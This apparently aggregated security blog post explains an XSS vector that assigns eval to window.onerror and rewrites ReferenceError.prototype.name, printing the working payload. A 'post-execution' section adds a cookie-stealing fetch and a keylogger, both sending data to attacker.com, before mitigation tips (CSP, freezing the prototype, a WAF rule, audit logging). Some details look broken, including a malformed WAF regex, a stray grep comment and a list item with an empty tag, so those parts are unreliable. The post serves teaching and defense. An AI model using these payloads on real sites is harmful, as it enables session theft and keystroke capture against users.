Advanced XSS Vector: Leveraging onerror and ReferenceError for Payload Execution

By /

Listen to this Post

Featured Image
This vector demonstrates a sophisticated XSS technique by combining `onerror` and `ReferenceError` manipulation to execute arbitrary JavaScript without explicit throw. The payload dynamically rewrites `ReferenceError.prototype.name` to include malicious code, triggering execution via an error handler.

Payload Breakdown

<img/src/onerror=window.onerror=eval;ReferenceError.prototype.name=';alert(1);var Uncaught//';z>

1. `onerror` Handler: Assigns `eval` to window.onerror, enabling dynamic code execution.

2. `ReferenceError` Manipulation: Overwrites `ReferenceError.prototype.name` to inject `alert(1)`.

  1. Triggering the Error: The malformed `` tag forces an error, executing the payload.

You Should Know:

1. Testing the Vector

  • Browser Console Verification:
    ReferenceError.prototype.name = ';console.log("XSS");//';
throw new ReferenceError(); // Triggers the injected code
  • DOM-Based XSS Detection:
    grep -r "onerror.eval" /var/www/html  Scan for vulnerable patterns

2. Mitigation Techniques

  • Content Security Policy (CSP):
    Content-Security-Policy: script-src 'self'; object-src 'none';
  • HTML Sanitization (Linux):
    sudo apt install libhtml-clean-perl
html_clean -strip < malicious.html > sanitized.html

3. Advanced Exploitation (Post-Execution)

  • Cookie Exfiltration:
    fetch('https://attacker.com/steal?data=' + document.cookie);
  • Keylogger Injection:
    document.onkeypress = (e) => fetch('https://attacker.com/log?key=' + e.key);

What Undercode Say

This technique bypasses traditional XSS filters by abusing JavaScript’s error-handling mechanism. Defenders must:
– Monitor `ReferenceError` modifications:

Object.freeze(ReferenceError.prototype);

– Deploy WAF Rules:

location / {
if ($request_uri ~ "onerror|eval(") { return 403; }
}

– Use Linux Audit Logs:

auditctl -a always,exit -F arch=b64 -S execve -k xss_attempts

Expected Output:

  • Successful execution of `alert(1)` or custom payloads.
  • Detection via CSP violations or server logs.

Reference:

XSS Cheat Sheet (PortSwigger)

Prediction:

XSS attacks will increasingly exploit ECMAScript edge cases, requiring stricter CSP policies and runtime protection tools like WASI-based sandboxing.

IT/Security Reporter URL:

Reported By: Gareth Heyes – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: